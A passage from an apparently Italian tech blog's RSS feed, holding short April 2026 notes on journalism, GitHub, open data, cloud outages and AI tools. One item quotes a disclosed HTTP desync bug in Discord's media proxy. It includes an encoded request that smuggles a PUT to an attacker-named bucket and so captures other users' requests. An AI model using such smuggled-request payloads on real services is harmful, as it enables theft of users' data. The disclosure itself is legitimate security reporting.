<p>A proposito della vicenda di cronaca nera che partendo dalle mie parti si è diffusa in tutta Italia è impossibile non notare il solito cortocircuito. Prima i media diffondono particolari macabri e inquietanti, virgolettati attribuiti all’ambulanziere sospettato degli omicidi di anziani pazienti, “prove” che non solo suggeriscono la colpevolezza dell’imputato ma ne disegnano i tratti di morbosa anomalia e che inevitabilmente coinvolgono molto delle persone intorno a lui, e poi, quando l’effetto atteso di una vasta indignazione (e di pagine viste e copie vendute) è stato ottenuto, iniziano a produrre la seconda onda: articoli sugli effetti a cascata che l’indignazione social ha prodotto sulle persone vicine all’imputato, quelle stesse persone che gli stessi media avevano ampiamente coinvolto. Come se le minacce social non fossero l’effetto inevitabile del cattivo giornalismo e delle sue intenzionali attenzioni ai particolari più inquietanti. Come ogni volta ciò che i media producono non è solo cattiva informazione ma anche una lesione ampia del senso di comunità. Cattiveria indotta come modello economico residuo che ha come effetto principale quello di mettere i cittadini gli uni contro gli altri.</p>
</blockquote>
<p><strong>Massimo Mantellini</strong> in <a href="https://www.mantellini.it/2026/04/15/giornalismo-come-lesione/">Giornalismo come lesione</a>.</p>]]>
      </content:encoded>
    </item>
    <item>
      <title>#476</title>
      <link>https://notedimatteo.it/476</link>
      <guid>https://notedimatteo.it/476</guid>
      <pubDate>Tue, 28 Apr 2026 18:46:03 GMT</pubDate>
      <category>note</category>
      <category>informazione</category>
      <category>tlc</category>
      <description>[Chiude Tiscali News](https://www.engage.it/media-industry/tesselis-chiude-tiscali-news-stop-alla-testata-e-giornalisti-verso-l-esodo.aspx) dopo lo spezzettamento di quel poco è rimasto di Tiscali, a …</description>
      <content:encoded>
        <![CDATA[<p><a href="https://www.engage.it/media-industry/tesselis-chiude-tiscali-news-stop-alla-testata-e-giornalisti-verso-l-esodo.aspx">Chiude Tiscali News</a> dopo lo spezzettamento di quel poco è rimasto di Tiscali, a 28 anni dalla fondazione.</p>
<blockquote>
<p>Il prossimo 30 aprile, come riportato dall'Ansa, cesseranno ufficialmente le pubblicazioni di Tiscali News, il portale d'informazione nato alla fine degli anni Novanta. [...] La chiusura coinvolge dodici giornalisti. Secondo quanto ricostruito da Adnkronos, la prospettiva per la redazione è l'uscita dal perimetro aziendale: dieci professionisti hanno già optato per l'esodo incentivato, lasciando l'azienda dal 5 maggio, mentre per i restanti due si prospetta la cassa integrazione.</p>
<p>Il piano di ristrutturazione di Tesselis poggia sulla cessione del ramo B2C (consumer), che comprende i servizi web, la mail e i marchi. L'acquirente individuato è Canarbino Spa, gruppo attivo nel settore energetico, la cui offerta è attualmente oggetto di una procedura competitiva che scadrà proprio il 30 aprile.</p>
</blockquote>]]>
      </content:encoded>
    </item>
    <item>
      <title>#475</title>
      <link>https://notedimatteo.it/475</link>
      <guid>https://notedimatteo.it/475</guid>
      <pubDate>Tue, 28 Apr 2026 18:20:30 GMT</pubDate>
      <category>note</category>
      <category>github</category>
      <description>Incredibile la [crescita di GitHub](https://github.blog/news-insights/company-news/an-update-on-github-availability/) recente. La quantità di codice scritta non è probabilmente mai stata così alta.

[…</description>
      <content:encoded>
        <![CDATA[<p>Incredibile la <a href="https://github.blog/news-insights/company-news/an-update-on-github-availability/">crescita di GitHub</a> recente. La quantità di codice scritta non è probabilmente mai stata così alta.</p>
<p><a href="https://uploads.notedimatteo.it/2026/04/7547799ec1ad.jpg"><img src="https://uploads.notedimatteo.it/2026/04/7547799ec1ad_preview.jpg" alt="" loading="lazy" width="1200" height="675"></a></p>
<blockquote>
<p>This exponential growth does not stress one system at a time. A pull request can touch Git storage, mergeability checks, branch protection, GitHub Actions, search, notifications, permissions, webhooks, APIs, background jobs, caches, and databases. At high scale, small inefficiencies compound: queues deepen, cache misses become database load, indexes fall behind, retries amplify traffic, and one slow dependency can affect several product experiences.</p>
<p>Our priorities are clear: availability first, then capacity, then new features. We are reducing unnecessary work, improving caching, isolating critical services, removing single points of failure, and moving performance-sensitive paths into systems designed for these workloads. This is distributed systems work: reducing hidden coupling, limiting blast radius, and making GitHub degrade gracefully when one subsystem is under pressure. We’re making progress quickly, but these incidents are examples of where there’s still work to do.</p>
</blockquote>]]>
      </content:encoded>
    </item>
    <item>
      <title>#474</title>
      <link>https://notedimatteo.it/474</link>
      <guid>https://notedimatteo.it/474</guid>
      <pubDate>Mon, 27 Apr 2026 18:21:36 GMT</pubDate>
      <category>note</category>
      <category>digitalizzazione</category>
      <category>italia</category>
      <category>opendata</category>
      <description>Un esito frequente delle richieste di pubblicazione di open data (come previsto dalla legge) è l&apos;assenza di risposta da parte dell&apos;amministrazione pubblica interpellata. È successo anche in questo cas…</description>
      <content:encoded>
        <![CDATA[<p>Un esito frequente delle richieste di pubblicazione di open data (come previsto dalla legge) è l'assenza di risposta da parte dell'amministrazione pubblica interpellata. È successo anche in questo caso <a href="https://datibenecomune.substack.com/p/liberiamoli-tutti-i-dati-sulle-firme">segnalato da onData</a> in merito ai dati statistici sulle <a href="https://firmereferendum.giustizia.it/referendum/open">firme per i referendum</a>:</p>
<blockquote>
<p>I dati che presentiamo in questa newsletter li abbiamo estratti noi. Ma quei dati dovrebbero già essere pubblici. È stato richiesto formalmente.</p>
<p>Il 10 dicembre 2025 l’associazione onData ha inviato al Ministero della Giustizia — tramite PEC — una richiesta di pubblicazione in formato aperto dei dati sulle raccolte firme, ai sensi dell’art. 5 del D.Lgs. 36/2006 (Riutilizzo dell’informazione del settore pubblico). Non una richiesta di accesso documentale per uso privato: una richiesta di rendere i dati disponibili a tutta la collettività, con licenza aperta e in formato leggibile meccanicamente.</p>
<p>Il Ministero non ha risposto.</p>
<p>L’11 gennaio 2026 onData ha presentato ricorso alla Commissione per l’accesso ai documenti amministrativi. Il 18 febbraio ha segnalato l’inadempimento anche al Difensore civico per il digitale (AgID), organo deputato a vigilare sull’apertura dei dati pubblici.</p>
<p>Il 31 marzo 2026 la Commissione si è pronunciata (decisione n. 3.110). La risposta è tecnica ma significativa: la Commissione ha dichiarato la propria incompetenza, non perché la richiesta di onData fosse sbagliata, ma perché il silenzio del Ministero — in materia di riutilizzo dei dati — non equivale a un diniego. Si tratta di un “silenzio-inadempimento”, non di un “silenzio-rifiuto”: una distinzione sottile ma decisiva, che sposta il rimedio possibile dal ricorso alla Commissione al ricorso al Tribunale Amministrativo Regionale (TAR), ai sensi dell’art. 117 del Codice del processo amministrativo.</p>
<p>Vale la pena di notare un dettaglio: nella sua relazione tecnica, il Ministero ha riconosciuto che pubblicare i dati sarebbe fattibile — ma non ha mai adottato un provvedimento formale, né in senso positivo né negativo. Il silenzio continua.</p>
<p>onData è ancora in attesa della risposta del Difensore civico per il digitale, ma nel frattempo i dati continuano a non essere pubblici.</p>
</blockquote>]]>
      </content:encoded>
    </item>
    <item>
      <title>#473</title>
      <link>https://notedimatteo.it/473</link>
      <guid>https://notedimatteo.it/473</guid>
      <pubDate>Mon, 27 Apr 2026 08:16:49 GMT</pubDate>
      <category>note</category>
      <category>business</category>
      <description>Questo elenco di &quot;fit&quot; di un candidato in un&apos;azienda è molto interessante. È quasi un framework per definire che cosa ci si aspetta da un ambiente di lavoro:

&gt; **Independence vs. Collaboration:** Thi…</description>
      <content:encoded>
        <![CDATA[<p>Questo elenco di "fit" di un candidato in un'azienda è molto interessante. È quasi un framework per definire che cosa ci si aspetta da un ambiente di lavoro:</p>
<blockquote>
<p><strong>Independence vs. Collaboration:</strong> This covers both how you work and how you make decisions. Some companies need people who pick up a problem, run with it, and come back with a solution. Others expect you to bring the team along at every step. These often go together: companies that want you to work solo also tend to want you to make calls on your own, and companies that want collaborative work also want group buy-in on decisions.</p>
<p>If every story you tell involves going off and building something alone, consensus-driven companies will worry you’ll steamroll people or make choices that won’t stick. Flip it around: if every story involves checking with the group before you act, companies that prize individual ownership will wonder whether you can make a decision without a meeting.</p>
<p><strong>Speed vs. Thoroughness:</strong> Startups often need rapid experimentation, where you ship MVPs and iterate based on feedback, while companies in healthcare or finance require careful validation before any release. This tension also shows up in how teams think about code quality: some organizations will happily spend extra weeks on clean architecture, while others want a working solution on deadline even if the code needs cleanup later. Whereas stories about methodical testing might bore a startup, your “ship it and fix it” examples could terrify a medical device company.</p>
<p><strong>Excellence vs. Pragmatism:</strong> Some organizations value technical excellence and clean architecture above all else. Others need pragmatic solutions that ship on deadline even if imperfect. Focusing on perfect code fails at deadline-driven companies, just as accepting technical debt everywhere fails at companies maintaining critical infrastructure.</p>
<p><strong>Innovation vs. Stability:</strong> Some roles require creating new solutions and challenging existing approaches, while others need you to maintain and optimize proven systems. If you say that you’re constantly reinventing established processes, teams that value stability will not consider you a good fit. Conversely, stories that show you only follow existing patterns will disappoint teams that are looking for creative problem-solving</p>
<p><strong>Direct vs. Diplomatic:</strong> Some cultures prize radical candor and want you to say exactly what you think. Others value maintaining harmony and face-saving communication. If you are too blunt, you will not fit in well at a relationship-focused company. If you are not direct enough, you will not like working at a company that values “disagree and commit.”</p>
<p><strong>Data vs. Intuition:</strong> Some companies require data to justify every decision (”data-driven” cultures), while others trust experienced judgment and move on gut feel. Showing that you make decisions based on instinct does not impress analytical companies, and telling a company that values experienced judgment that you conduct three A/B tests to choose a button color will get you struck off their list.</p>
<p><strong>Specialist vs. Generalist:</strong> Large companies often want deep experts who master one domain, while smaller companies need people who are comfortable wearing multiple hats. Know which sort of company you are walking into.</p>
</blockquote>
<p>(<a href="https://newsletter.pragmaticengineer.com/p/learnings-from-conducting-1000-interviews">Learnings from conducting ~1,000 interviews at Amazon</a>)</p>]]>
      </content:encoded>
    </item>
    <item>
      <title>#472</title>
      <link>https://notedimatteo.it/472</link>
      <guid>https://notedimatteo.it/472</guid>
      <pubDate>Mon, 27 Apr 2026 08:07:13 GMT</pubDate>
      <category>note</category>
      <category>domini</category>
      <description>Ennesima horror story con GoDaddy in [**GoDaddy Gave a Domain to a Stranger Without Any Documentation**](https://anchor.host/godaddy-gave-a-domain-to-a-stranger-without-any-documentation/). Una lista …</description>
      <content:encoded>
        <![CDATA[<p>Ennesima horror story con GoDaddy in <a href="https://anchor.host/godaddy-gave-a-domain-to-a-stranger-without-any-documentation/"><strong>GoDaddy Gave a Domain to a Stranger Without Any Documentation</strong></a>. Una lista di altre horror story <a href="https://news.ycombinator.com/item?id=47913874">in questo post</a>.</p>]]>
      </content:encoded>
    </item>
    <item>
      <title>#471</title>
      <link>https://notedimatteo.it/471</link>
      <guid>https://notedimatteo.it/471</guid>
      <pubDate>Sun, 26 Apr 2026 16:13:12 GMT</pubDate>
      <category>note</category>
      <category>ai</category>
      <description>Il [system prompt](https://x.com/samhenrigold/status/2048181315686547564/photo/1) del nuovo AI playlist generator [di Spotify](https://newsroom.spotify.com/2025-04-24/spotify-expands-ai-playlist-in-be…</description>
      <content:encoded>
        <![CDATA[<p>Il <a href="https://x.com/samhenrigold/status/2048181315686547564/photo/1">system prompt</a> del nuovo AI playlist generator <a href="https://newsroom.spotify.com/2025-04-24/spotify-expands-ai-playlist-in-beta-to-premium-listeners-in-40-new-markets/">di Spotify</a> (non c'è in Italia):</p>
<p><a href="https://uploads.notedimatteo.it/2026/04/86d45143a2fb.jpg"><img src="https://uploads.notedimatteo.it/2026/04/86d45143a2fb_preview.jpg" alt="" loading="lazy" width="1200" height="688"></a></p>]]>
      </content:encoded>
    </item>
    <item>
      <title>#470</title>
      <link>https://notedimatteo.it/470</link>
      <guid>https://notedimatteo.it/470</guid>
      <pubDate>Sun, 26 Apr 2026 07:26:49 GMT</pubDate>
      <category>segnalibri</category>
      <description>[**USB Cheat Sheet**](https://fabiensanglard.net/usbcheat/index.html). Visto che gli standard USB sono confusionari e le cose cambiano nome ogni tanto.

[img width=1200 height=1354]2026/04/1f3fcc8c742…</description>
      <content:encoded>
        <![CDATA[<p><a href="https://fabiensanglard.net/usbcheat/index.html"><strong>USB Cheat Sheet</strong></a>. Visto che gli standard USB sono confusionari e le cose cambiano nome ogni tanto.</p>
<p><a href="https://uploads.notedimatteo.it/2026/04/1f3fcc8c742f.jpg"><img src="https://uploads.notedimatteo.it/2026/04/1f3fcc8c742f_preview.jpg" alt="" loading="lazy" width="1200" height="1354"></a></p>]]>
      </content:encoded>
    </item>
    <item>
      <title>#469</title>
      <link>https://notedimatteo.it/469</link>
      <guid>https://notedimatteo.it/469</guid>
      <pubDate>Sat, 25 Apr 2026 14:10:43 GMT</pubDate>
      <category>note</category>
      <category>ai</category>
      <category>claude</category>
      <description>È di gennaio quindi forse non aggiornato ma questi sono i [limiti presunti](https://she-llac.com/claude-limits) dei piani in abbonamento di Claude:

[img width=1200 height=1555]2026/04/f5504420b098.jp…</description>
      <content:encoded>
        <![CDATA[<p>È di gennaio quindi forse non aggiornato ma questi sono i <a href="https://she-llac.com/claude-limits">limiti presunti</a> dei piani in abbonamento di Claude:</p>
<p><a href="https://uploads.notedimatteo.it/2026/04/f5504420b098.jpg"><img src="https://uploads.notedimatteo.it/2026/04/f5504420b098_preview.jpg" alt="" loading="lazy" width="1200" height="1555"></a></p>
<p>Il costo è molto più basso rispetto a usare le API direttamente, anche se va considerato che anche le API hanno probabilmente un grosso margine quindi non è chiaro se il tutto sia sostenibile per Anthropic.</p>]]>
      </content:encoded>
    </item>
    <item>
      <title>#468</title>
      <link>https://notedimatteo.it/468</link>
      <guid>https://notedimatteo.it/468</guid>
      <pubDate>Fri, 24 Apr 2026 21:07:57 GMT</pubDate>
      <category>cit</category>
      <category>microsoft</category>
      <category>github</category>
      <description>&gt; Elizabeth Pemmerl, GitHub’s chief revenue officer, also announced her resignation last week, according to sources at GitHub. “After eleven years on this amazing journey, I have decided it’s the righ…</description>
      <content:encoded>
        <![CDATA[<blockquote>
<p>Elizabeth Pemmerl, GitHub’s chief revenue officer, also announced her resignation last week, according to sources at GitHub. “After eleven years on this amazing journey, I have decided it’s the right time for the next chapter,” said Pemmerl in a message to GitHub employees, seen by Notepad. Microsoft has appointed Dan Stein, former head of software and digital platforms for Microsoft Customer and Partner Solutions (MCAPS), as the new chief revenue officer for GitHub. It’s the latest sign of Microsoft’s ownership influence on GitHub.</p>
<p>“There’s basically no more GitHub at all anymore,” one GitHub employee tells me. “It’s all Microsoft, and the company is collapsing, both in outages that are reallllly bad and have torched the company reputation… and in an exodus of leadership.”</p>
</blockquote>
<p><strong>Tom Warren</strong> in <a href="https://www.theverge.com/tech/917361/microsoft-executive-departures-notepad">Inside Microsoft’s wave of executive departures</a></p>]]>
      </content:encoded>
    </item>
    <item>
      <title>#467</title>
      <link>https://notedimatteo.it/467</link>
      <guid>https://notedimatteo.it/467</guid>
      <pubDate>Fri, 24 Apr 2026 20:48:30 GMT</pubDate>
      <category>note</category>
      <category>meta</category>
      <description>Chi poteva farlo [se non Meta](https://newsletter.pragmaticengineer.com/p/the-pulse-ai-token-spending-out-of)?

&gt;And when an employee asked if it’s possible to opt out, Meta’s CTO replied that it is n…</description>
      <content:encoded>
        <![CDATA[<p>Chi poteva farlo <a href="https://newsletter.pragmaticengineer.com/p/the-pulse-ai-token-spending-out-of">se non Meta</a>?</p>
<blockquote>
<p>And when an employee asked if it’s possible to opt out, Meta’s CTO replied that it is not: every US-based engineer will have their keystrokes logged, mouse movements captured, and work tracked.</p>
</blockquote>]]>
      </content:encoded>
    </item>
    <item>
      <title>#466</title>
      <link>https://notedimatteo.it/466</link>
      <guid>https://notedimatteo.it/466</guid>
      <pubDate>Thu, 23 Apr 2026 11:20:44 GMT</pubDate>
      <category>note</category>
      <category>cloud</category>
      <category>ovh</category>
      <description>[L&apos;esperienza di Lettermint.co](https://x.com/i/status/2047261521240080388) con OVHcloud:

&gt; Some incidents were acknowledged late. Some were never clearly acknowledged. Some only appeared on the stat…</description>
      <content:encoded>
        <![CDATA[<p><a href="https://x.com/i/status/2047261521240080388">L'esperienza di Lettermint.co</a> con OVHcloud:</p>
<blockquote>
<p>Some incidents were acknowledged late. Some were never clearly acknowledged. Some only appeared on the status page after customers had already been impacted for hours (or even days!).</p>
<p>A few examples (these are the ones we shared with the OVH team):</p>
<ul>
<li>Feb 23, 2025: unable to create nodes for a full day (Keystone errors, 500s).</li>
<li>Mar 26, 2025: node timeouts in GRA11, never properly acknowledged.</li>
<li>Apr 8, 2025: BYOIP issue where Microsoft services were unreachable.</li>
<li>Apr 11, 2025: major production incident, multiple nodes down. Support replied 11 days later.</li>
<li>Apr–May 2025: recurring DNS issues (even domains like Stripe intermittently failed to resolve).</li>
<li>Aug 27, 2025: unannounced cluster updates → replication issues → data corruption → restore from backup.</li>
<li>Sep 2, 2025: ~2.5 hours downtime across the entire region due to Keystone (an OpenStack service they use).</li>
<li>Sep 10, 2025: another outage (~30+ minutes).</li>
<li>Oct 2025: CEPH/block storage instability and Kubernetes API issues.</li>
<li>Nov 2025 onward (3-AZ Paris): Object Storage problems begin.</li>
<li>Dec 2025 – Apr 2026: repeated S3 timeouts and 503s for months.</li>
<li>Feb 5, 2026: OVHcloud restarted all nodes at once (PDB ignored).</li>
<li>Mar 5, 2026: similar issue again.</li>
</ul>
</blockquote>]]>
      </content:encoded>
    </item>
    <item>
      <title>#465</title>
      <link>https://notedimatteo.it/465</link>
      <guid>https://notedimatteo.it/465</guid>
      <pubDate>Thu, 23 Apr 2026 08:20:22 GMT</pubDate>
      <category>note</category>
      <category>ai</category>
      <category>codex</category>
      <category>openai</category>
      <description>La mia esperienza media con Codex, che lo rende per me inusabile:

[img width=1200 height=641]2026/04/3f4bc01db641.jpg[/img]

Un tizio ha [studiato](https://nrehiew.github.io/blog/minimal_editing/) l&apos;…</description>
      <content:encoded>
        <![CDATA[<p>La mia esperienza media con Codex, che lo rende per me inusabile:</p>
<p><a href="https://uploads.notedimatteo.it/2026/04/3f4bc01db641.jpg"><img src="https://uploads.notedimatteo.it/2026/04/3f4bc01db641_preview.jpg" alt="" loading="lazy" width="1200" height="641"></a></p>
<p>Un tizio ha <a href="https://nrehiew.github.io/blog/minimal_editing/">studiato</a> l'<em>over-editing</em> dei modelli linguistici e in effetti i modelli GPT sono quelli che tendono ad aggiungere più complessità.</p>]]>
      </content:encoded>
    </item>
    <item>
      <title>#464 / OpenAI Privacy Filter</title>
      <link>https://notedimatteo.it/464/openai-privacy-filter</link>
      <guid>https://notedimatteo.it/464/openai-privacy-filter</guid>
      <pubDate>Wed, 22 Apr 2026 19:53:50 GMT</pubDate>
      <category>note</category>
      <category>ai</category>
      <category>openai</category>
      <description>C&apos;è un [nuovo modello open](https://openai.com/index/introducing-openai-privacy-filter/) di OpenAI:

&gt;Privacy Filter is a small model with frontier personal data detection capability. It is designed f…</description>
      <content:encoded>
        <![CDATA[<p>C'è un <a href="https://openai.com/index/introducing-openai-privacy-filter/">nuovo modello open</a> di OpenAI:</p>
<blockquote>
<p>Privacy Filter is a small model with frontier personal data detection capability. It is designed for high-throughput privacy workflows, and is able to perform context-aware detection of PII in unstructured text. It can run locally, which means that PII can be masked or redacted without leaving your machine. It processes long inputs efficiently, making redaction decisions in a quick, single pass.</p>
</blockquote>
<p>Dimensione da 1,5 miliardi di parametri di cui 50 milioni attivi. Disponibile su <a href="https://huggingface.co/openai/privacy-filter">Hugging Face</a> con licenza Apache 2.0 (quindi anche uso commerciale).</p>]]>
      </content:encoded>
    </item>
    <item>
      <title>#463</title>
      <link>https://notedimatteo.it/463</link>
      <guid>https://notedimatteo.it/463</guid>
      <pubDate>Tue, 21 Apr 2026 21:16:50 GMT</pubDate>
      <category>note</category>
      <category>digitalizzazione</category>
      <category>italia</category>
      <description>[&quot;Autorizzazione all&apos;ingresso per cure in Italia di **cittadini extracomunitari**&quot;](https://www.salute.gov.it/new/it/servizi-online/ase-ext-ric/autorizzazione-allingresso-cure-italia-di-cittadini-extr…</description>
      <content:encoded>
        <![CDATA[<p><a href="https://www.salute.gov.it/new/it/servizi-online/ase-ext-ric/autorizzazione-allingresso-cure-italia-di-cittadini-extracomunitari/">"Autorizzazione all'ingresso per cure in Italia di <strong>cittadini extracomunitari</strong>"</a> e la procedura richiede di inviare una PEC.</p>
<p>E poi: il servizio è gratuito, ma il pagamento va fatto con PagoPA.</p>
<p>Straordinario.</p>]]>
      </content:encoded>
    </item>
    <item>
      <title>#462</title>
      <link>https://notedimatteo.it/462</link>
      <guid>https://notedimatteo.it/462</guid>
      <pubDate>Tue, 21 Apr 2026 17:12:10 GMT</pubDate>
      <category>note</category>
      <description>Interessante startup USA, [Impulse](https://www.impulselabs.com/), che ha sviluppato un piano a induzione con manopole magnetiche e batteria, per poter raggiungere potenze fino a 10 kW (l&apos;acqua bolle …</description>
      <content:encoded>
        <![CDATA[<p>Interessante startup USA, <a href="https://www.impulselabs.com/">Impulse</a>, che ha sviluppato un piano a induzione con manopole magnetiche e batteria, per poter raggiungere potenze fino a 10 kW (l'acqua bolle in 40 secondi).</p>
<p>Costa 7.000 dollari. La tecnologia è fornita in licenza anche ad altri produttori. Il primo fuori dagli USA è italiano: BS Service Group <a href="https://x.com/sdamico/status/2046305532148154846">produrrà in Italia</a> il modello Eximius con tecnologia Impulse.</p>
<p><a href="https://uploads.notedimatteo.it/2026/04/862ca47f879c.jpg"><img src="https://uploads.notedimatteo.it/2026/04/862ca47f879c_preview.jpg" alt="" loading="lazy" width="1200" height="750"></a></p>]]>
      </content:encoded>
    </item>
    <item>
      <title>#461</title>
      <link>https://notedimatteo.it/461</link>
      <guid>https://notedimatteo.it/461</guid>
      <pubDate>Tue, 21 Apr 2026 10:21:41 GMT</pubDate>
      <category>cit</category>
      <category>ai</category>
      <category>dev</category>
      <description>&gt; Imagine if this is as good as AI gets. If this is where it stops, you&apos;d still have models that can almost code a web browser, almost code a compiler—and can even present a pretty cool demo if allowe…</description>
      <content:encoded>
        <![CDATA[<blockquote>
<p>Imagine if this is as good as AI gets. If this is where it stops, you'd still have models that can almost code a web browser, almost code a compiler—and can even present a pretty cool demo if allowed to take a few shortcuts. You'd still get models that can kinda-sorta simulate worlds and write kinda-sorta engaging stories. You'd still get self-driving cars that almost work, except when they don't. You get AI that can make you like 90% of a thing!</p>
<p>90% is a lot. Will you care about the last 10%?</p>
<p>I'm terrified that you won't.</p>
<p>I'm terrified of the good enough to ship—and I'm terrified of nobody else caring. I'm less afraid of AI agents writing apps that they will never experience than I am of the AI herders who won't care enough to actually learn what they ship. And I sure as hell am afraid of the people who will experience the slop and will be fine with it.</p>
<p>[...]</p>
<p>I'm terrified that our craft will die, and nobody will even care to mourn it.</p>
</blockquote>
<p><strong>Dima Konev</strong>, software engineer, in <a href="https://ezhik.jp/ai-slop-terrifies-me/">(AI) Slop Terrifies Me</a>.</p>]]>
      </content:encoded>
    </item>
    <item>
      <title>#460</title>
      <link>https://notedimatteo.it/460</link>
      <guid>https://notedimatteo.it/460</guid>
      <pubDate>Tue, 21 Apr 2026 10:11:46 GMT</pubDate>
      <category>note</category>
      <category>browser</category>
      <description>Un tizio ha [installato](https://jack.cab/blog/every-firefox-extension) tutte le estensioni esistenti per Firefox, circa 84mila. Funziona! Ma richiede 32 GB di RAM e un po&apos; di pazienza (la pagina este…</description>
      <content:encoded>
        <![CDATA[<p>Un tizio ha <a href="https://jack.cab/blog/every-firefox-extension">installato</a> tutte le estensioni esistenti per Firefox, circa 84mila. Funziona! Ma richiede 32 GB di RAM e un po' di pazienza (la pagina estensioni richiede 6 ore per caricarsi).</p>]]>
      </content:encoded>
    </item>
    <item>
      <title>#459</title>
      <link>https://notedimatteo.it/459</link>
      <guid>https://notedimatteo.it/459</guid>
      <pubDate>Mon, 20 Apr 2026 08:21:42 GMT</pubDate>
      <category>note</category>
      <category>ai</category>
      <description>Il modo di parlare fastidiossissimo e innaturale delle AI è diventato [misurabile](https://x.com/dlondonwortel/status/2045903608781152555):

[img width=1179 height=1256]2026/04/76bfec4b2d64.jpg[/img]</description>
      <content:encoded>
        <![CDATA[<p>Il modo di parlare fastidiossissimo e innaturale delle AI è diventato <a href="https://x.com/dlondonwortel/status/2045903608781152555">misurabile</a>:</p>
<p><a href="https://uploads.notedimatteo.it/2026/04/76bfec4b2d64.jpg"><img src="https://uploads.notedimatteo.it/2026/04/76bfec4b2d64_preview.jpg" alt="" loading="lazy" width="1179" height="1256"></a></p>]]>
      </content:encoded>
    </item>
    <item>
      <title>#458</title>
      <link>https://notedimatteo.it/458</link>
      <guid>https://notedimatteo.it/458</guid>
      <pubDate>Sat, 18 Apr 2026 18:34:57 GMT</pubDate>
      <category>cit</category>
      <category>business</category>
      <category>italia</category>
      <description>&gt;Ci laviamo la coscienza con la modulistica per non prenderci la responsabilità di cambiare davvero.

[**Carlotta Silvestrini**](https://www.linkedin.com/in/carlottasilvestrini/)</description>
      <content:encoded>
        <![CDATA[<blockquote>
<p>Ci laviamo la coscienza con la modulistica per non prenderci la responsabilità di cambiare davvero.</p>
</blockquote>
<p><a href="https://www.linkedin.com/in/carlottasilvestrini/"><strong>Carlotta Silvestrini</strong></a></p>]]>
      </content:encoded>
    </item>
    <item>
      <title>#457 / HTTP desync in Discord&apos;s media proxy</title>
      <link>https://notedimatteo.it/457/http-desync-in-discords-media-proxy</link>
      <guid>https://notedimatteo.it/457/http-desync-in-discords-media-proxy</guid>
      <pubDate>Sat, 18 Apr 2026 14:47:58 GMT</pubDate>
      <category>segnalibri</category>
      <category>cdn</category>
      <category>cloud</category>
      <category>security</category>
      <description>[**HTTP desync in Discord&apos;s media proxy**](https://tmctmt.com/posts/http-desync-in-discord/). Vulnerabilità interessante nel proxy di Discord verso il bucket Google Cloud Storage:

&gt; I sent the follow…</description>
      <content:encoded>
        <![CDATA[<p><a href="https://tmctmt.com/posts/http-desync-in-discord/"><strong>HTTP desync in Discord's media proxy</strong></a>. Vulnerabilità interessante nel proxy di Discord verso il bucket Google Cloud Storage:</p>
<blockquote>
<p>I sent the following request to the media proxy:</p>
<pre><code class="language-http">GET /attachments/%20HTTP/1.1%0AHost:x%0A%0APUT%20/request.txt%20HTTP/1.1%0AHost:myevilbucket.storage.googleapis.com%0AContent-Length:250%0A%0A HTTP/1.1
Host: media.discordapp.net
</code></pre>
<p>Which caused the backend to send out these two requests to GCP:</p>
<pre><code class="language-http">GET /attachments/ HTTP/1.1
Host:x
</code></pre>
<pre><code class="language-http">PUT /request.txt HTTP/1.1
Host:myevilbucket.storage.googleapis.com
Content-Length:250

 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.6; rv:92.0) Gecko/20100101 Firefox/92.0
Host: discord.storage.googleapis.com
</code></pre>
<p>The PUT request expected 250 bytes of data but only ~150 bytes were given, meaning that the deficit would be eaten from whatever gets written to the stream next, i.e., the next borrower’s request.</p>
<p>And sure enough when I checked a moment later, my request.txt had an attachment link in it I’ve never seen before: [...]</p>
</blockquote>]]>
      </content:encoded>
    </item>
    <item>
      <title>#456 / Tokenmaxxing</title>
      <link>https://notedimatteo.it/456</link>
      <guid>https://notedimatteo.it/456</guid>
      <pubDate>Sat, 18 Apr 2026 09:12:40 GMT</pubDate>
      <category>cit</category>
      <category>ai</category>
      <category>dev</category>
      <description>&gt; It feels to me that a good part of the industry is using token count numbers similarly to how the lines-of-code-produced metric was used years ago. There was a time when the number of lines written …</description>
      <content:encoded>
        <![CDATA[<blockquote>
<p>It feels to me that a good part of the industry is using token count numbers similarly to how the lines-of-code-produced metric was used years ago. There was a time when the number of lines written daily or monthly was an important metric in programmer productivity, until it became clear that it’s a terrible thing to focus on. A lines-of-code metric can easily be gamed by writing boilerplate or throwaway code. Also, the best developers are not necessarily those who write the most code; they’re the ones who solve hard problems for the business quickly and reliably with – or without – code!</p>
<p>Similarly, the number of tokens a dev generates can easily be gamed, and if this metric is measured then devs will indeed game it. But doing so generates a massive accompanying AI bill!</p>
</blockquote>
<p><strong>Gergely Orosz</strong> in <a href="https://newsletter.pragmaticengineer.com/p/the-pulse-tokenmaxxing-as-a-weird">The Pulse: ‘Tokenmaxxing’ as a weird new trend</a>.</p>]]>
      </content:encoded>
    </item>
    <item>
      <title>#455</title>
      <link>https://notedimatteo.it/455</link>
      <guid>https://notedimatteo.it/455</guid>
      <pubDate>Sat, 18 Apr 2026 09:05:08 GMT</pubDate>
      <category>note</category>
      <category>streaming</category>
      <category>video</category>
      <description>[**The Human Infrastructure: How Netflix Built the Operations Layer Behind Live at Scale**](https://netflixtechblog.com/the-human-infrastructure-how-netflix-built-the-operations-layer-behind-live-at-s…</description>
      <content:encoded>
        <![CDATA[<p><a href="https://netflixtechblog.com/the-human-infrastructure-how-netflix-built-the-operations-layer-behind-live-at-scale-33e2a311c597"><strong>The Human Infrastructure: How Netflix Built the Operations Layer Behind Live at Scale</strong></a>. Un po' di backstage della nuova linea di business di Netflix: gli eventi live.</p>
<p><a href="https://uploads.notedimatteo.it/2026/04/768f2e896f3d.jpg"><img src="https://uploads.notedimatteo.it/2026/04/768f2e896f3d_preview.jpg" alt="" loading="lazy" width="1200" height="584"></a></p>
<p><a href="https://uploads.notedimatteo.it/2026/04/edb58e6b3544.jpg"><img src="https://uploads.notedimatteo.it/2026/04/edb58e6b3544_preview.jpg" alt="" loading="lazy" width="1200" height="778"></a></p>]]>
      </content:encoded>
    </item>
    <item>
      <title>#454</title>
      <link>https://notedimatteo.it/454</link>
      <guid>https://notedimatteo.it/454</guid>
      <pubDate>Sat, 18 Apr 2026 08:25:35 GMT</pubDate>
      <category>video</category>
      <category>aws</category>
      <category>cloud</category>
      <category>kubernetes</category>
      <description>[**Duolingo&apos;s Kubernetes Leap**](https://www.infoq.com/presentations/duolingo-eks-kubernetes/). Non l&apos;ho visto, ma qui Duolingo spiega la migrazione da AWS ECS a EKS.

&gt;To give you an idea of the scal…</description>
      <content:encoded>
